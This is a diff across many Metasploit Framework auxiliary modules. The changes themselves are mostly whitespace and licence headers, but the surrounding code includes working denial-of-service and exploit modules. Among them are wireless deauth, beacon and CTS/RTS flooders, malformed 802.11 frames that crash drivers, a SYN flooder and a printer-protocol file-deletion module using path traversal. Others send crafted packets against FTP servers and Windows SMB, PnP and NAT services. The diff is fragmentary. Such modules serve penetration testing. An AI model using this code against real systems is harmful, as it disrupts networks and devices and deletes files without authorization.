@ -79,7 +79,7 @@ class Metasploit3 < Msf::Auxiliary
control << "U" + ("../" * 10) + "#{datastore['RPATH']}\x00\n"
dataf = Rex::Text.rand_text_alpha(100)+1
print_status("Deleting #{datstore['RPATH']}...")
if !(
send_file(sock1, 2, "cfA" + jid + r_hostname, control) and
@ -88,28 +88,28 @@ class Metasploit3 < Msf::Auxiliary
sock1.close
return
end
print_status("Successfully deleted #{datastore['RPATH']} >:-]")
sock1.close
end
def send_file(s, type, name, data='')
s.put(type.chr + data.length.to_s + " " + name + "\n")
res = s.get_once(1)
if !(res and res[0] == ?\0)
print_status("The target did not accept our control file command (#{name})")
return
end
s.put(data)
s.put("\x00")
res = s.get_once(1)
if !(res and res[0] == ?\0)
print_status("The target did not accept our control file data (#{name})")
return
end
end
print_status(sprintf(" Uploaded %.4d bytes >> #{name}", data.length))
return true
end

View File

@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -27,7 +27,7 @@ class Metasploit3 < Msf::Auxiliary
},
'Author' => 'todb',
'License' => MSF_LICENSE,
'References' =>
'References' =>
[
['BID', '37670'],
['OSVDB', '61538'],
@ -41,7 +41,7 @@ class Metasploit3 < Msf::Auxiliary
OptInt.new('SPORT', [false, 'Source port (defaults to random)']),
OptAddress.new('SHOST', [false, 'Source address (defaults to random)'])
])
deregister_options('FILTER','PCAPFILE', 'SNAPLEN')
end
@ -77,11 +77,10 @@ class Metasploit3 < Msf::Auxiliary
n.l4.ack = 0
n.l4.seq = rand(0xffffffff)
n.l4.add_option(101,"")
n.l4.fix!(n.l3.src_ip, n.l3.dst_ip, '')
n.l4.fix!(n.l3.src_ip, n.l3.dst_ip, '')
pkt = n.pack
print_status("#{n.l3.dst_ip}:#{n.l4.dst_port} Sending TCP Syn packet from #{n.l3.src_ip}:#{n.l4.src_port}")
capture_sendto(pkt,rhost)
close_pcap
end
end

View File

@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -32,7 +32,7 @@ class Metasploit3 < Msf::Auxiliary
OptInt.new('SPORT', [false, 'The source port (else randomizes)']),
OptInt.new('NUM', [false, 'Number of SYNs to send (else unlimited)'])
])
deregister_options('FILTER','PCAPFILE')
end
@ -68,14 +68,14 @@ class Metasploit3 < Msf::Auxiliary
while (num <= 0) or (sent < num)
n.l3.src_ip = srchost
n.l3.src_ip = srchost
n.l3.id = rand(0x10000)
n.l3.ttl = rand(128)+128
n.l3.ttl = rand(128)+128
n.l4.window = rand(4096)+1
n.l4.src_port = sport
n.l4.seq = rand(0x100000000)
n.l4.fix!(n.l3.src_ip, n.l3.dst_ip, '')
n.l4.fix!(n.l3.src_ip, n.l3.dst_ip, '')
pkt = n.pack

View File

@ -1,18 +1,29 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Lorcon2
include Msf::Auxiliary::Dos
def initialize(info ={})
super(update_info(info,
'Name' => 'Wireless CTS/RTS Flooder',
'Description' => %q{
This module sends 802.11 CTS/RTS requests to a specific wireless peer,
using the specified source address,
using the specified source address,
},
'Author' => [ 'Brad Antoniewicz' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$'
@ -37,21 +48,21 @@ class Metasploit3 < Msf::Auxiliary
when 'CTS'
frame =create_cts()
else
else
print_status("No TYPE selected!!")
return
return
end
open_wifi
open_wifi
print_status("Sending #{datastore['NUM']} #{datastore['TYPE'].upcase} frames.....")
datastore['NUM'].to_i.times do
wifi.write(frame)
end
end
end
def create_rts
frame =
"\xb4" + # Type/SubType
"\x00" + # Flags
@ -62,8 +73,8 @@ class Metasploit3 < Msf::Auxiliary
return frame
end
def create_cts
frame =
frame =
"\xc4" + # Type/SubType
"\x00" + # Flags
"\xff\x7f" + # Duration

View File

@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -19,21 +19,21 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'Apple Airport 802.11 Probe Response Kernel Memory Corruption',
'Description' => %q{
The Apple Airport driver provided with Orinoco-based Airport cards (1999-2003 PowerBooks, iMacs)
is vulnerable to a remote memory corruption flaw. When the driver is placed into active scanning
is vulnerable to a remote memory corruption flaw. When the driver is placed into active scanning
mode, a malformed probe response frame can be used to corrupt internal kernel structures, leading
to arbitrary code execution. This vulnerability is triggered when a probe response frame is received
that does not contain valid information element (IE) fields after the fixed-length header. The data
following the fixed-length header is copied over internal kernel structures, resulting in memory
that does not contain valid information element (IE) fields after the fixed-length header. The data
following the fixed-length header is copied over internal kernel structures, resulting in memory
operations being performed on attacker-controlled pointer values.
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'References' =>
'References' =>
[
['CVE', '2006-5710'],
['OSVDB', '30180'],
@ -44,7 +44,7 @@ class Metasploit3 < Msf::Auxiliary
[
OptInt.new('COUNT', [ true, "The number of frames to send", 2000]),
OptString.new('ADDR_DST', [ true, "The MAC address of the target system"])
], self.class)
], self.class)
end
#
@ -54,38 +54,38 @@ class Metasploit3 < Msf::Auxiliary
def run
open_wifi
cnt = datastore['COUNT'].to_i
print_status("Creating malicious probe response frame...")
print_status("Creating malicious probe response frame...")
frame = create_frame()
print_status("Sending #{cnt} frames...")
cnt.times { wifi.write(frame) }
end
def create_frame
bssid = Rex::Text.rand_text(6)
seq = [rand(255)].pack('n')
caps = [rand(65535)].pack('n')
frame =
frame =
"\x50" + # type/subtype
"\x00" + # flags
"\x00\x00" + # duration
"\x00\x00" + # duration
eton(datastore['ADDR_DST']) + # dst
bssid + # src
bssid + # bssid
seq + # seq
seq + # seq
Rex::Text.rand_text(8) + # timestamp value
Rex::Text.rand_text(2) + # beacon interval
Rex::Text.rand_text(2) # capabilities
frame << [0x0defaced].pack('N') * ((1024-frame.length) / 4)
return frame
end
end
end
=begin

View File

@ -1,10 +1,21 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Lorcon2
include Msf::Auxiliary::Dos
def initialize(info ={})
super(update_info(info,
'Name' => 'Wireless DEAUTH Flooder',
@ -12,7 +23,7 @@ class Metasploit3 < Msf::Auxiliary
This module sends 802.11 DEAUTH requests to a specific wireless peer,
using the specified source address and source BSSID.
},
'Author' => [ 'Brad Antoniewicz' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$'
@ -27,7 +38,7 @@ class Metasploit3 < Msf::Auxiliary
end
def run
print_status("Creating Deauth frame with the following attributes:")
print_status("\tDST: #{datastore['ADDR_DST']}")
print_status("\tSRC: #{datastore['ADDR_SRC']}")
@ -41,11 +52,11 @@ class Metasploit3 < Msf::Auxiliary
wifi.write(create_deauth())
end
close_wifi
end
end
def create_deauth
seq = [rand(255)].pack('n')
seq = [rand(255)].pack('n')
frame =
"\xc0" + # Type/SubType
"\x00" + # Flags
@ -53,7 +64,7 @@ class Metasploit3 < Msf::Auxiliary
eton(datastore['ADDR_DST']) + # dst addr
eton(datastore['ADDR_SRC']) + # src addr
eton(datastore['ADDR_BSS']) + # BSSID
seq + # sequence number
seq + # sequence number
"\x07\x00" # Reason Code (nonassoc. sta)
return frame
end

View File

@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -20,18 +20,18 @@ class Metasploit3 < Msf::Auxiliary
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'Wireless Fake Access Point Beacon Flood',
'Description' => %q{
This module can advertise thousands of fake access
points, using random SSIDs and BSSID addresses. Inspired
by Black Alchemy's fakeap tool.
},
'Author' => [ 'hdm', 'kris katterjohn' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$'
))
))
register_options([
OptInt.new('NUM', [false, "Number of beacons to send"]),
@ -59,39 +59,39 @@ class Metasploit3 < Msf::Auxiliary
bssid = Rex::Text.rand_text(6)
end
seq = [rand(255)].pack('n')
"\x80" + # type/subtype
"\x00" + # flags
"\x00\x00" + # duration
"\x00\x00" + # duration
"\xff\xff\xff\xff\xff\xff" + # dst
bssid + # src
bssid + # bssid
seq + # seq
seq + # seq
Rex::Text.rand_text(8) + # timestamp value
"\x64\x00" + # beacon interval
"\x00\x05" + # capability flags
# ssid tag
"\x00" + ssid.length.chr + ssid +
# supported rates
"\x01" + "\x08" + "\x82\x84\x8b\x96\x0c\x18\x30\x48" +
# current channel
"\x03" + "\x01" + datastore['CHANNEL'].to_i.chr +
"\x03" + "\x01" + datastore['CHANNEL'].to_i.chr +
# traffic indication map
"\x05" + "\x04" + "\x00\x01\x02\x20" +
# country information
"\x07" + "\x06" + "\x55\x53\x20\x01\x0b\x12" +
# erp information
"\x2a" + "\x01" + "\x00" +
# extended supported rates
"\x32" + "\x04" + "\x12\x24\x60\x6c"
end
end

View File

@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -17,25 +17,25 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Lorcon2
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'NetGear MA521 Wireless Driver Long Rates Overflow',
'Description' => %q{
This module exploits a buffer overflow in the NetGear MA521 wireless device
driver under Windows XP. When a specific malformed frame (beacon or probe response)
is received by the wireless interface under active scanning mode, the MA521nd5.SYS
is received by the wireless interface under active scanning mode, the MA521nd5.SYS
driver attempts to write to an attacker-controlled memory location. The vulnerability
is triggered by an invalid supported rates information element.
This DoS was tested with version 5.148.724.2003 of the MA521nd5.SYS driver and a
This DoS was tested with version 5.148.724.2003 of the MA521nd5.SYS driver and a
NetGear MA521 Cardbus adapter. A remote code execution module is also in development.
This module depends on the Lorcon2 library and only works on the Linux platform
with a supported wireless card. Please see the Ruby Lorcon2 documentation
with a supported wireless card. Please see the Ruby Lorcon2 documentation
(external/ruby-lorcon/README) for more information.
},
'Author' => [ 'Laurent Butti <0x9090 [at] gmail.com>' ], # initial discovery and metasploit module
'License' => MSF_LICENSE,
'References' =>
@ -44,13 +44,13 @@ class Metasploit3 < Msf::Auxiliary
['OSVDB', '30507'],
['URL', 'http://projects.info-pull.com/mokb/MOKB-18-11-2006.html'],
['URL', 'ftp://downloads.netgear.com/files/ma521_1_2.zip']
]
]
))
register_options(
[
OptInt.new('RUNTIME', [ true, "The number of seconds to run the attack", 60]),
OptString.new('ADDR_DST', [ true, "The MAC address of the target system", 'FF:FF:FF:FF:FF:FF'])
], self.class)
], self.class)
end
def run
@ -80,15 +80,15 @@ class Metasploit3 < Msf::Auxiliary
ssid = Rex::Text.rand_text(6)
bssid = Rex::Text.rand_text(6)
seq = [rand(255)].pack('n')
frame =
frame =
"\x80" + # type/subtype
"\x00" + # flags
"\x00\x00" + # duration
"\x00\x00" + # duration
eton(datastore['ADDR_DST']) + # dst
bssid + # src
bssid + # bssid
seq + # seq
seq + # seq
Rex::Text.rand_text(8) + # timestamp value
"\x64\x00" + # beacon interval
"\x01\x00" + # capabilities
@ -101,7 +101,7 @@ class Metasploit3 < Msf::Auxiliary
# channel IE
"\x03" + "\x01" + channel.chr
return frame
end

View File

@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -17,39 +17,39 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Lorcon2
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'NetGear WG311v1 Wireless Driver Long SSID Overflow',
'Description' => %q{
This module exploits a buffer overflow in the NetGear WG311v1 wireless device
driver under Windows XP and 2000. A kernel-mode heap overflow occurs
when malformed probe response frame is received that contains a long SSID field
This DoS was tested with version 2.3.1.10 of the WG311ND5.SYS driver and a
This DoS was tested with version 2.3.1.10 of the WG311ND5.SYS driver and a
NetGear WG311v1 PCI card. A remote code execution module is also in development.
This module depends on the Lorcon2 library and only works on the Linux platform
with a supported wireless card. Please see the Ruby Lorcon2 documentation
with a supported wireless card. Please see the Ruby Lorcon2 documentation
(external/ruby-lorcon/README) for more information.
},
'Author' => [ 'Laurent Butti <0x9090 [at] gmail.com>' ], # initial discovery and metasploit module
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2006-6125'],
['OSVDB', '30511'],
['URL', 'http://projects.info-pull.com/mokb/MOKB-22-11-2006.html'],
['URL', 'http://projects.info-pull.com/mokb/MOKB-22-11-2006.html'],
['URL', 'ftp://downloads.netgear.com/files/wg311_1_3.zip'],
]
]
))
register_options(
[
OptInt.new('RUNTIME', [ true, "The number of seconds to run the attack", 60]),
OptString.new('ADDR_DST', [ true, "The MAC address of the target system"])
], self.class)
], self.class)
end
def run
@ -78,15 +78,15 @@ class Metasploit3 < Msf::Auxiliary
def create_probe_response
bssid = Rex::Text.rand_text(6)
seq = [rand(255)].pack('n')
frame =
frame =
"\x50" + # type/subtype
"\x00" + # flags
"\x00\x00" + # duration
"\x00\x00" + # duration
eton(datastore['ADDR_DST']) + # dst
bssid + # src
bssid + # bssid
seq + # seq
seq + # seq
Rex::Text.rand_text(8) + # timestamp value
"\x64\x00" + # beacon interval
"\x01\x00" + # capabilities
@ -99,10 +99,10 @@ class Metasploit3 < Msf::Auxiliary
# channel IE
"\x03" + "\x01" + channel.chr
return frame
end
end
end
=begin

View File

@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -19,40 +19,40 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'Multiple Wireless Vendor NULL SSID Probe Response',
'Description' => %q{
This module exploits a firmware-level vulnerability in a variety of
This module exploits a firmware-level vulnerability in a variety of
802.11b devices. This attack works by sending a probe response frame
containing a NULL SSID information element to an affected device. This
flaw affects many cards based on the Choice MAC (Intersil, Lucent, Agere,
flaw affects many cards based on the Choice MAC (Intersil, Lucent, Agere,
Orinoco, and the first generation of Airport cards).
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
['URL', 'http://802.11ninja.net/papers/firmware_attack.pdf'],
['WVE', '2006-0064']
['WVE', '2006-0064']
]
))
register_options(
[
OptInt.new('COUNT', [ true, "The number of frames to send", 2000]),
OptString.new('ADDR_DST', [ true, "The MAC address of the target system"])
], self.class)
], self.class)
end
def run
open_wifi
cnt = datastore['COUNT'].to_i
print_status("Creating malicious probe response frame...")
print_status("Creating malicious probe response frame...")
frame = create_frame()
print_status("Sending #{cnt} frames...")
cnt.times { wifi.write(frame) }
end
@ -61,21 +61,21 @@ class Metasploit3 < Msf::Auxiliary
bssid = Rex::Text.rand_text(6)
seq = [rand(255)].pack('n')
caps = [rand(65535)].pack('n')
frame =
frame =
"\x50" + # type/subtype
"\x00" + # flags
"\x00\x00" + # duration
"\x00\x00" + # duration
eton(datastore['ADDR_DST']) + # dst
bssid + # src
bssid + # bssid
seq + # seq
seq + # seq
Rex::Text.rand_text(8) + # timestamp value
Rex::Text.rand_text(2) + # beacon interval
Rex::Text.rand_text(2) + # capabilities
[0, 0].pack('CC') # Type=SSID(0) Length=0
return frame
end
end
end

View File

@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -19,17 +19,17 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'Wireless Test Module',
'Description' => %q{
This module is a test of the wireless packet injection system.
Please see external/ruby-lorcon/README for more information.
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$'
))
))
end
def run

View File

@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -17,15 +17,15 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'Appian Enterprise Business Suite 5.6 SP1 DoS',
'Description' => %q{
This module exploits a denial of service flaw in the Appian
Enterprise Business Suite service.
Enterprise Business Suite service.
},
'Author' => [ 'guiness.stout <guinness.stout@gmail.com>' ],
'License' => BSD_LICENSE,
'Version' => '$Revision$',
@ -37,17 +37,17 @@ class Metasploit3 < Msf::Auxiliary
],
'DisclosureDate' => 'Dec 17 2007'
))
register_options([Opt::RPORT(5400),], self.class)
end
def run
print_status('Connecting to the service...')
connect
# mod: randomize the static "saint" strings from the PoC - hdm
req =
req =
"\x02\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00\x00" +
@ -93,10 +93,10 @@ class Metasploit3 < Msf::Auxiliary
"\x00\x00\x00\x03\x00\x00\x00\x00\xe2\x16\x00\x01\x09\x06\x08\x33"+
"\x6d\x7f\xff\xff\xff\xfe\x02\x09\x00\x00\x00\x00\x0a\x68\x00\x00"+
"\x00"
print_status('Sending exploit...')
sock.put(req)
disconnect
end

View File

@ -3,10 +3,10 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
# http://metasploit.com/framework/
##
require 'msf/core'
@ -18,7 +18,7 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'FileZilla FTP Server Admin Interface Denial of Service',
'Description' => %q{
This module triggers a Denial of Service condition in the FileZilla FTP

View File

@ -3,10 +3,10 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
# http://metasploit.com/framework/
##
require 'msf/core'
@ -18,7 +18,7 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'FileZilla FTP Server <=0.9.21 Malformed PORT Denial of Service',
'Description' => %q{
This module triggers a Denial of Service condition in the FileZilla FTP

View File

@ -3,10 +3,10 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
# http://metasploit.com/framework/
##
require 'msf/core'
@ -15,9 +15,9 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Ftp
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'Titan FTP Server 6.26.630 SITE WHO DoS',
'Description' => %q{
The Titan FTP server v6.26 build 630 can be DoS'd by

View File

@ -3,10 +3,10 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
# http://metasploit.com/framework/
##
require 'msf/core'
@ -15,9 +15,9 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Ftp
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'XM Easy Personal FTP Server 5.6.0 NLST DoS',
'Description' => %q{
This module is a port of shinnai's script. You need

View File

@ -3,10 +3,10 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
# http://metasploit.com/framework/
##
require 'msf/core'
@ -15,9 +15,9 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Ftp
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'XM Easy Personal FTP Server 5.7.0 NLST DoS',
'Description' => %q{
You need a valid login to DoS this FTP server, but

View File

@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -17,14 +17,14 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Udp
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'Microsoft Windows NAT Helper Denial of Service',
'Description' => %q{
This module exploits a denial of service vulnerability
within the Internet Connection Sharing service in
Windows XP.
within the Internet Connection Sharing service in
Windows XP.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
@ -36,7 +36,7 @@ class Metasploit3 < Msf::Auxiliary
[ 'CVE', '2006-5614' ],
],
'DisclosureDate' => 'Oct 26 2006'))
register_options([Opt::RPORT(53),], self.class)
end
@ -46,14 +46,15 @@ class Metasploit3 < Msf::Auxiliary
pkt = "\x6c\xb6\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00"
pkt << "\x03" + Rex::Text.rand_text_english(3) + "\x06"
pkt << Rex::Text.rand_text_english(10) + "\x03"
pkt << Rex::Text.rand_text_english(3)
pkt << Rex::Text.rand_text_english(3)
pkt << "\x00\x00\x01\x00\x01"
print_status("Sending dos packet...")
udp_sock.put(pkt)
disconnect_udp
end
end

View File

@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -15,22 +15,22 @@ require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::DCERPC
include Msf::Exploit::Remote::SMB
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'Microsoft Plug and Play Service Registry Overflow',
'Description' => %q{
This module triggers a stack overflow in the Windows Plug
and Play service. This vulnerability can be exploited on
Windows 2000 without a valid user account. Since the PnP
service runs inside the service.exe process, this module
will result in a forced reboot on Windows 2000. Obtaining
will result in a forced reboot on Windows 2000. Obtaining
code execution is possible if user-controlled memory can
be placed at 0x00000030, 0x0030005C, or 0x005C005C.
be placed at 0x00000030, 0x0030005C, or 0x005C005C.
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
@ -43,12 +43,12 @@ class Metasploit3 < Msf::Auxiliary
[ 'OSVDB', '18830' ]
]
))
register_options(
[
OptString.new('SMBPIPE', [ true, "The pipe name to use (browser, srvsvc, wkssvc, ntsvcs)", 'browser']),
], self.class)
end
=begin
@ -67,7 +67,7 @@ class Metasploit3 < Msf::Auxiliary
# Determine which pipe to use
pipe = datastore['SMBPIPE']
print_status("Connecting to the SMB service...")
connect()
smb_login()
@ -91,12 +91,12 @@ class Metasploit3 < Msf::Auxiliary
path = "HTREE\\ROOT" + ("\\" * i)
# 0 = nil, 1 = enum, 2/3 = services, 4 = enum (currentcontrolset|caps)
stubdata =
stubdata =
NDR.long(rand(0xffffffff)) +
NDR.wstring(path) +
NDR.wstring(path) +
NDR.long(4) +
NDR.long(1) +
NDR.long(1) +
print_status("Calling the vulnerable function...")
@ -111,8 +111,8 @@ class Metasploit3 < Msf::Auxiliary
raise e
end
end
disconnect
disconnect
end
end

View File

@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -19,17 +19,17 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'Microsoft SRV.SYS Mailslot Write Corruption',
'Description' => %q{
This module triggers a kernel pool corruption bug in SRV.SYS. Each
call to the mailslot write function results in a two byte return value
call to the mailslot write function results in a two byte return value
being written into the response packet. The code which creates this packet
fails to consider these two bytes in the allocation routine, resulting in
a slow corruption of the kernel memory pool. These two bytes are almost
a slow corruption of the kernel memory pool. These two bytes are almost
always set to "\xff\xff" (a short integer with value of -1).
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
@ -48,12 +48,12 @@ class Metasploit3 < Msf::Auxiliary
'DefaultAction' => 'Attack',
'DisclosureDate' => 'Jul 11 2006'
))
register_options(
[
OptString.new('MAILSLOT', [ true, "The mailslot name to use", 'Alerter']),
], self.class)
end
# MAILSLOT: HydraLsServer
@ -64,7 +64,7 @@ class Metasploit3 < Msf::Auxiliary
case action.name
when 'Attack'
print_status("Mangling the kernel, two bytes at a time...");
connect
@ -84,7 +84,7 @@ class Metasploit3 < Msf::Auxiliary
rescue ::Exception => e
if (i == 1)
if (i == 1)
print_status("Failed to write any data to the mailslot: #{e}")
break
end
@ -96,8 +96,8 @@ class Metasploit3 < Msf::Auxiliary
# Errors:
# 0xc0000034 = object not found
# 0xc0000205 = insufficient resources (too much data)
# 0xc0000205 = insufficient resources (too much data)
end
disconnect

View File

@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -19,14 +19,14 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'Microsoft SRV.SYS Pipe Transaction No Null',
'Description' => %q{
This module exploits a NULL pointer dereference flaw in the
SRV.SYS driver of the Windows operating system. This bug was
independently discovered by CORE Security and ISS.
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
@ -38,7 +38,7 @@ class Metasploit3 < Msf::Auxiliary
['BID', '19215'],
]
))
end
def run
@ -52,11 +52,11 @@ class Metasploit3 < Msf::Auxiliary
1.upto(5) do |i|
print_status("Sending bad SMB transaction request #{i}...");
self.simple.client.trans_nonull(
"\\#{Rex::Text.rand_text_alphanumeric(rand(16)+1)}",
'',
Rex::Text.rand_text_alphanumeric(rand(16)+1),
3,
[1,0,1].pack('vvv'),
"\\#{Rex::Text.rand_text_alphanumeric(rand(16)+1)}",
'',
Rex::Text.rand_text_alphanumeric(rand(16)+1),
3,
[1,0,1].pack('vvv'),
true
)
end

View File

@ -1,10 +1,21 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::SMB
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'Microsoft SRV.SYS WriteAndX Invalid DataOffset',
'Description' => %q{
This module exploits a denial of service vulnerability in the
@ -14,7 +25,7 @@ class Metasploit3 < Msf::Auxiliary
'Author' => [ 'j.v.vallejo[at]gmail.com' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
'References' =>
[
['MSB', 'MS09-001'],
['OSVDB', '48153'],
@ -49,7 +60,7 @@ class Metasploit3 < Msf::Auxiliary
pkt['Payload'].v['AccessMask'] = 0x2019f # Maximum Allowed
pkt['Payload'].v['ShareAccess'] = 7
pkt['Payload'].v['CreateOptions'] = 0x400040
pkt['Payload'].v['Impersonation'] = 2
pkt['Payload'].v['Impersonation'] = 2
pkt['Payload'].v['Disposition'] = 1
pkt['Payload'].v['Payload'] = "\x00\\\x00L\x00S\x00A\x00R\x00P\x00C" + "\x00\x00"

View File

@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
